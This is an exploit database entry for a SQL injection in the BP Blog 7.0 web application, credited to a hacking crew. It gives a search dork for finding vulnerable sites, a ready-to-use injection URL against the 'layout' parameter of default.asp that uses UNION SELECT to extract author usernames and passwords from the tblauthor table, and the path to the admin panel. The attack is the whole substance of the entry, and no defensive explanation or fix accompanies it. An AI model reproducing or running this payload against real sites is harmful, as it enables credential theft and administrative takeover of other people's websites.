BP Blog 7.0 (default.asp layout) Remote SQL Injection Vulnerability

2007-03-12T00:00:00
ID 1337DAY-ID-1577
Type zdt
Reporter BeyazKurt
Modified 2007-03-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
BP Blog 7.0 (default.asp layout) Remote SQL Injection Vulnerability
===================================================================



#####################################
# Script : BP Blog
# D0rk   : "Powered by BP Blog 7.0"
# thnx   : Forever.slam and all WorldHackerz Team!
#
# WorldHackerz Mirr0r'da Taht Bizimdir (h) :=)
#####################################
-------
Exploit :
http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
Admin Panel : admin_default.asp



#  0day.today [2018-03-19]  #